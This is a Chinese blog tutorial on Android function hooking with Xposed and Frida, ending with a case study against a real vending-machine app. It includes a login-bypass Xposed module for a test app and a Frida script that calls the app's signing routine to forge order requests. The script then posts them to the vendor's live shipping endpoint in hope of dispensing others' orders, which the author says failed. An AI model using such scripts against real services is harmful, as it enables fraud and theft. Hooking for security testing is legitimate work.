678
淺談android hook技術
前言
在測試android過程中,能對函數進行hook能幫助更加深入的進行測試,本文簡單介紹了hook框架xposed和frida,從簡單的小例子做了簡單的演示,算是自己的學習的過程,是個入門的過程。
xposed框架
xposed,主頁:https://repo.xposed.info/module/de.robv.android.xposed.installer是個開源的框架,在github上有源碼的,直接下載apk後安裝激活就可以使用,很多地方有這方麵的教程,針對不同的手機架構,有大牛做了針對性的修改。可以在論壇中進行搜索,通過替換/system/bin/app_process程序控製zygote進程,使得app_process在啟動過程中會加載XposedBridge.jar這個jar包,從而完成對Zygote進程及其創建的Dalvik虛擬機的劫持。
Xposed在開機的時候完成對所有的Hook Function的劫持,在原Function執行的前後加上自定義代碼,很多人將這個框架用在對android的私有化定製上麵,其實在android安全測試方麵這個框架提供了很大的便利,xposed主要是對方法的hook,在以往的重打包技術中,需要對smali代碼的進行修改,修改起來比較麻煩。
利用xposed框架可以很容易的獲取到android應用中的信息,比如加密私鑰、salt值等等,不需要反編譯獲取密鑰轉換算法、不需要了解密鑰保存機製,直接hook函數,獲取輸入輸出就可以。
原理
在Android係統中,應用程序進程都是由Zygote進程孵化出來的,而Zygote進程是由Init進程啟動的。Zygote進程在啟動時會創建一個Dalvik虛擬機實例,每當它孵化一個新的應用程序進程時,都會將這個Dalvik虛擬機實例複製到新的應用程序進程裏麵去,從而使得每一個應用程序進程都有一個獨立的Dalvik虛擬機實例。這也是Xposed選擇替換app_process的原因。
Zygote進程在啟動的過程中,除了會創建一個Dalvik虛擬機實例之外,還會將Java運行時庫加載到進程中來,以及注冊一些Android核心類的JNI方法來前麵創建的Dalvik虛擬機實例中去。注意,一個應用程序進程被Zygote進程孵化出來的時候,不僅會獲得Zygote進程中的Dalvik虛擬機實例拷貝,還會與Zygote一起共享Java運行時庫。這也就是可以將XposedBridge這個jar包加載到每一個Android應用程序中的原因。XposedBridge有一個私有的Native(JNI)方法hookMethodNative,這個方法也在app_process中使用。這個函數提供一個方法對象利用Java的Reflection機製來對內置方法覆寫。有能力的可以針對xposed的源碼進行分析,不得不說,作者對於android的機製和java的了解已經相當深入了。
簡單實例
很簡單的一個android登入代碼:
public class MainActivity extends AppCompatActivity {
private TextView accountView;
private TextView passwdView;
private Button loginBut;
private Button quitBut;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
accountView = (TextView) findViewById(R.id.account);
passwdView = (TextView) findViewById(R.id.pwd);
loginBut = (Button) findViewById(R.id.login);
quitBut = (Button) findViewById(R.id.quit);
loginBut.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
String username = accountView.getText() + "";
String password = passwdView.getText() + "";
if(isCorrectInfo(username,password)){
Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();
}
else{
Toast.makeText(MainActivity.this,"登入失敗",Toast.LENGTH_LONG).show();
}
}
});
}
public boolean isCorrectInfo(String username, String password) {
if(username.equals("admin") && password.equals("passwd")){
return true;
}
else{
return false;
}
}
}
很簡單的就是判斷下用戶輸入的用戶名和密碼是正確,這裏做個簡單的演示,將用戶輸入的用戶名和密碼信息hook出來不管正確與否
簡單說下xposed模塊的開發,首先需要的是導入api,具體的可以參考:https://github.com/rovo89/XposedBridge/wiki/Using-the-Xposed-Framework-API
在manifest中定義
<application android:label="xposed">
<meta-data
android:name="xposedmodule"
android:value="true" />
<meta-data
android:name="xposeddescription"
android:value="hook test" />
<meta-data
android:name="xposedminversion"
android:value="82" />
</application>
聲明這個是xposed模塊,名稱為hook test 並且使用api版本號是82
下麵創建運行時候的hook代碼:
package com.example.xposed;
import java.util.List;
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.callbacks.XC_LoadPackage;
import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;
public class Main implements IXposedHookLoadPackage {
// 包加載的時候回調
public void handleLoadPackage(final XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
//過濾掉不是com.example.logintest的應用
if (!lpparam.packageName.equals("com.example.logintest"))
return;
XposedBridge.log("加載應用:" + lpparam.packageName);
// Hook MainActivity 中的判斷方法
findAndHookMethod("com.example.logintest.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,String.class new XC_MethodHook() {
@Override
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
super.beforeHookedMethod(param);
// XposedBridge.log("開始劫持~~~~");
// XposedBridge.log("參數1:" + param.args[0]);
XposedBridge.log("參數2:" + param.args[1]);
XposedBridge.log("修改登入數據~~~~");// 修改為正確的用戶名密碼
param.args[0]="admin";
param.args[1]="passwd";
}
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
// super.afterHookedMethod(param);
XposedBridge.log("劫持結束~~~~");
// XposedBridge.log("參數1:" + param.args[0]);
// XposedBridge.log("參數2:" + param.args[1]);
}
});
}
}
看代碼中的注釋,主要是三個方法的調用,handleLoadPackage,主要是獲取到android包的相關信息,這裏由於隻是對logintest進行hook,做下簡單的判斷。
findAndHookMethod 是主要的hook入口,裏麵幾個參數分別為包名,classloader,hook的函數名,參數類型(這個比較容易出錯,比如list類型寫為List.class),回調函數
回調函數中比較重要的:beforeHookedMethod和afterHookedMethod,一個是在函數運行前劫持掉,一個是hook後放行,實例中對用戶輸入的字段進行劫持打印,後麵將參數之改為正確登入用戶名和密碼,這樣在app中輸入任何字符都能登入成功
frida Hook框架
Frida是一款基於python + javascript 的hook框架,通殺android\ios\linux\win\osx等各平台,由於是基於腳本的交互,因此相比xposed和substrace cydia更加便捷,本文重點介紹Frida在android下麵的使用。
Frida的官網為:https://www.frida.re/
安裝
安裝Frida非常簡單,在pc端直接執行
pip install frida
即可
在Android設備需要導入frida的服務端,需要root你的手機
$ curl -O https://build.frida.re/frida/android/arm/bin/frida-server$ chmod+x frida-server
$ adb push frida-server /data/local/tmp/
運行
設備上運行frida-server:
$ adb shell
root@android:/ # chmod 700 frida-server
$ adb shell
root@android:/ # /data/local/tmp/frida-server -t 0 (注意在root下運行)
電腦上運行adb forward tcp轉發:
adb forward tcp:27042 tcp:27042adb forward tcp:27043 tcp:27043
27042端口用於與frida-server通信,之後的每個端口對應每個注入的進程.
運行如下命令驗證是否成功安裝:
$ frida-ps-R
正常情況應該輸出進程列表如下:
PID NAME1590 com.facebook.katana
13194 com.facebook.katana:providers
12326 com.facebook.orca
13282 com.twitter.android
…
Hook模塊的編寫
hook的主要模塊是js編寫的,利用javascript的api與server進行通信
下麵結合一個真實例子進行簡單的介紹,首先是測試代碼:
# -*- coding:utf-8 -*-
import frida, sys #引入frida類
import logging
logging.basicConfig(filename='test.log', level=logging.INFO)
reload(sys)
sys.setdefaultencoding('utf-8') #對輸出進行utf8的編碼
print sys.getdefaultencoding()
def print_result(message): #對輸出的信息進行打印
print message
logging.info(message)
def on_message(message, data): # 反調函數,用來接受message的信息,message後麵會說到
try:
print_result(message=message)
except:
pass
did = "255601452" # 訂單id
time = "1472706588" # 時間戳
jscode = """ # 核心代碼,這段主要是調用app中的相應處理函數,後麵會分析這段代碼的來源
Dalvik.perform(function () { # 說明是Dalvik平台
var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
var context = currentApplication.getApplicationContext();
var signclass = Dalvik.use("com.ub.main.d.e");# 調用com.ub.main.d.e類
var signInstance=signclass.$new(context); # 反射創建一個新的對象
var sign=signInstance.a("255601452"); #調用對象的a函數
send(sign); #將調用函數的結果發送出來
});
"""
#print jscode
process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # 獲取連接的設備並枚舉取最後一個設備連接,並附到com.ub.main的進程上麵
print process
script = process.create_script(jscode) # 調用相應的js函數,獲取函數調用後的結果值
script.on('message', on_message) # 利用回調,將message傳遞給on_message函數
print "done"
script.load()
反編譯獲取app中的核心函數
對於上麵的js代碼,其實就是調用app中的某個函數,比如sign值生成函數,加密解密函數,不需要自己單獨的去分析算法流程,分析key值在哪,直接調用app的相應函數,讓app幫我們完成這些工作
這裏我們分析的app是友寶,這是一款飲料售貨機,當時抓包看到提貨的時候是隻有個訂單id的,猜想是不是遍曆訂單的id,支付成功但是沒有取貨的訂單會不會響應請求,自己掉貨出來
下麵對友寶的訂單進行分析過程
1、抓取支付訂單成功鏈接
https://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4 postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588
分析:sign是校驗值,主要是防止訂單偽造的,orderid是產生的支付訂單id,這個主要是防止偽造用
2、反編譯友寶app
找到morder/shipping所在的包為:com/ub/main/d/e.class
其中localStringBuffer存儲的就是url中的參數信息,該請求查找到的代碼在a()
StringBuffer localStringBuffer = new StringBuffer();
localStringBuffer.append("clientversion");
localStringBuffer.append("=");
try
{
localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(), 0).versionName));
localStringBuffer.append("&");
localStringBuffer.append("machine_type");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode(Build.MODEL));
localStringBuffer.append("&");
localStringBuffer.append("os");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));
localStringBuffer.append("&");
localStringBuffer.append("channel_id");
localStringBuffer.append("=");
localStringBuffer.append(this.g.u());
localStringBuffer.append("&");
localStringBuffer.append("device_no");
localStringBuffer.append("=");
Object localObject1 = "";
try
{
String str5 = Uri.encode(i.a(this.e));
localObject1 = str5;
}
catch (Exception localException1)
{
Object localObject2;
for (;;) {}
}
localStringBuffer.append((String)localObject1);
localStringBuffer.append("&");
localStringBuffer.append("imei");
localStringBuffer.append("=");
localObject2 = "";
try
{
String str4 = Uri.encode(i.b(this.e));
localObject2 = str4;
}
catch (Exception localException2)
{
boolean bool;
String str1;
String str2;
String str3;
for (;;) {}
}
localStringBuffer.append((String)localObject2);
localStringBuffer.append("&");
localStringBuffer.append("device_id");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode("2"));
localStringBuffer.append("&");
localStringBuffer.append("u");
localStringBuffer.append("=");
localStringBuffer.append(Uri.encode(this.f.c()));
localStringBuffer.append("&");
localStringBuffer.append("wake_id");
localStringBuffer.append("=");
localStringBuffer.append("0");
localStringBuffer.append("&");
localStringBuffer.append("net_type");
localStringBuffer.append("=");
localStringBuffer.append(i.g(this.e));
localStringBuffer.append("&");
localStringBuffer.append("carrier_type");
localStringBuffer.append("=");
localStringBuffer.append(i.h(this.e));
bool = this.f.f();
str1 = this.f.l();
str2 = this.f.m();
if (bool)
{
str3 = "4";
l.a("weipeipei", "get參數---->isUboxAccount = " + bool + ", s = " + str3);
localStringBuffer.append("&");
localStringBuffer.append("s");
localStringBuffer.append("=");
localStringBuffer.append(str3);
return localStringBuffer.toString().trim();
}
}
catch (PackageManager.NameNotFoundException localNameNotFoundException)
{
for (;;)
{
localNameNotFoundException.printStackTrace();
continue;
if ((str1 != null) && (!str1.trim().equals(""))) {
str3 = "2";
} else if ((str2 != null) && (!str2.trim().equals(""))) {
str3 = "3";
} else {
str3 = "0";
}
}
}
}
生成簽名的函數在com/ub/main/d/e.class中的b函數
public String b(String[][] paramArrayOfString)
輸入的是一個array
上麵的請求函數在:
public String a(String paramString)
{
String[][] arrayOfString = new String[2][];
arrayOfString[0] = { "orderId", paramString };
String[] arrayOfString1 = new String[2];
arrayOfString1[0] = "timestamp";
arrayOfString1[1] = d;
arrayOfString[1] = arrayOfString1;
return b(arrayOfString);
}
最後加上sign值,發送請求
3、可以反編譯出他的sign計算方法,也可以直接調用b函數來產生sign值,後來發現app會自動取時間戳,我們就不需要給他array型的參數,直接調用a函數,把orderId給他,讓他直接return一個值出來就好了,就有了上麵的js代碼
4、自動化的批量處理
看代碼
# __author__ = 'gaohe'# -*- coding:utf-8 -*-
import frida, sys
import logging
import requests
logging.basicConfig(filename='test.log', level=logging.INFO)
reload(sys)
sys.setdefaultencoding('utf-8')
# print sys.getdefaultencoding()
class ubox:
def __init__(self):
pass
def request(self, payload):
# print "requests"
dict = {}
url = "https://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"
for i in payload.split("&"):
key = i.split("=")[0]
value = i.split("=")[1]
dict[key] = value
data=dict
r=requests.post(url=url,data=data)
print r.text
def print_result(self, message):
# print message
payload = message["payload"]
print payload
self.request(payload)
def on_message(self, message, data):
self.print_result(message=message)
def fuzzing(self, did):
jscode = """
Dalvik.perform(function () {
var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
var context = currentApplication.getApplicationContext();
var signclass = Dalvik.use("com.ub.main.d.e");
var signInstance=signclass.$new(context);
var sign=signInstance.a("%s");
send(sign);
});
""" % did
# print jscode
process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main")
# print process
script = process.create_script(jscode)
script.on('message', self.on_message)
# print "done"
script.load()
# sys.stdin.read()
ub = ubox()
ub.fuzzing("255912964")
構造了一個類,後麵直接fuzz uid就可以了,提取裏麵的sign值拚接到post數據中去
可以產生的post請求和抓到的數據包的請求是完全一樣的,但是並沒有測試成功,分析原因有可能是訂單id和用戶的id有所綁定。
不過學習到了怎樣通過frida對app進行分析。
複雜參數的hook
如果遇到函數的參數類型是數組、map、ArrayList類型的,首先目標MyClass類的fun1函數,聲明如下:
public static boolean fun1(String[][] strAry, Map mp1, Map<String,String> mp2, Map<Integer, String> mp3,ArrayList<String> al1, ArrayList<Integer> al2, ArgClass ac)
解決方法:
用Xposed自身提供的XposedHelpers的findClass方法加載每一個類,然後再將得到的類傳遞給hook函數作參數!
參考鏈接:
https://xianzhi.aliyun.com/forum/read/611.html
https://www.freebuf.com/articles/terminal/56453.html
https://bbs.pediy.com/showthread.php?t=202147&page=2
最後更新:2017-04-07 21:25:10